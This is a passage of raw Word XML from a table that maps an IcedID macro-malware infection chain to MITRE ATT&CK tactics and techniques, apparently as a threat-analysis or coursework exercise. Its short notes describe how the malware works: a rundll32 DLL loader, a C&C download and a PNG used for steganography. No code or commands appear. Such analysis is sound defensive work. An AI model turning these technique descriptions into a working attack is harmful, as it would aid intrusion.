                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349F989A" w14:textId="77777777" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69AE15BF" w14:textId="191500EA" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56853D5E" w14:textId="0D786B05" w:rsidR="00630876" w:rsidRPr="00630876" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50901816" w14:textId="6DC6A576" w:rsidR="00630876" w:rsidRPr="00AB2DC0" w:rsidRDefault="00630876" w:rsidP="00630876">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB2DC0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">If the victim enables macros on a vulnerable Windows computer, the victim’s host retrieves an installer DLL for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF725C" w:rsidRPr="00B857D7" w14:paraId="348D514C" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B43C368" w14:textId="2C74A5A8" w:rsidR="00CF725C" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21AC5DC6" w14:textId="49D4082C" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">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855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C964B78" w14:textId="5D21C238" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF725C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Binary Proxy Execution: Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA32ED" w14:textId="7324CB10" w:rsidR="00CF725C" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E0A383" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79EDA444" w14:textId="658F1427" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CC3B014" w14:textId="338488B3" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5050D0B3" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Describing how DLLs executed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A46ADFA" w14:textId="58DEAF41" w:rsidR="00082BE8" w:rsidRPr="00AB2DC0" w:rsidRDefault="00082BE8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Also fits with new method approach noted (for this example attack)</w:t>
            </w:r>
            <w:r w:rsidR="00F40617">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F40617">
              <w:t>(this is the run method used by the malicious macros)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF725C" w:rsidRPr="00B857D7" w14:paraId="7D3DCB21" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57478A6A" w14:textId="7B8494C7" w:rsidR="00CF725C" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E95F9D8" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9EBE8B" w14:textId="00344343" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001749E8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001749E8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0700A3B4" w14:textId="0ED9BDA5" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E94F5A0" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739FCEAB" w14:textId="7B1A377E" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00F860E6" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C86444" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BB5F25" w14:textId="1CB21DD6" w:rsidR="00CF725C" w:rsidRPr="00AB2DC0" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF725C">
              <w:t>It will download the ICEDID loader as a DLL file with a different extension such as .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CF725C">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CF725C">
              <w:t xml:space="preserve"> or .pdf. It connects to the C&amp;C server to download a PNG file that contains encrypted data of the ICEDID malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C5758A" w:rsidRPr="00B857D7" w14:paraId="065CFBC8" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E56C519" w14:textId="77777777" w:rsidR="00C5758A" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D4474B" w14:textId="1F063E37" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00C5758A" w:rsidP="00422D95">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27BFE1CA" w14:textId="60E44918" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C5758A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1027.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C5758A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0745B82F" w14:textId="3BB95C04" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00F860E6" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18B7A696" w14:textId="77777777" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="587E9538" w14:textId="283483D6" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2F5F30" w14:textId="0FFB469A" w:rsidR="00C5758A" w:rsidRPr="00630876" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33635FBF" w14:textId="77777777" w:rsidR="00C5758A" w:rsidRPr="00AB2DC0" w:rsidRDefault="00C5758A" w:rsidP="00422D95">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF725C" w:rsidRPr="00B857D7" w14:paraId="14BAA8B6" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="764005FF" w14:textId="36ACED12" w:rsidR="00CF725C" w:rsidRDefault="00C5758A" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113310D5" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F198555" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="411CF26F" w14:textId="4C7CD4B5" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00F860E6" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E8D5D2D" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603C3A72" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019B22FA" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRPr="00630876" w:rsidRDefault="00CF725C" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
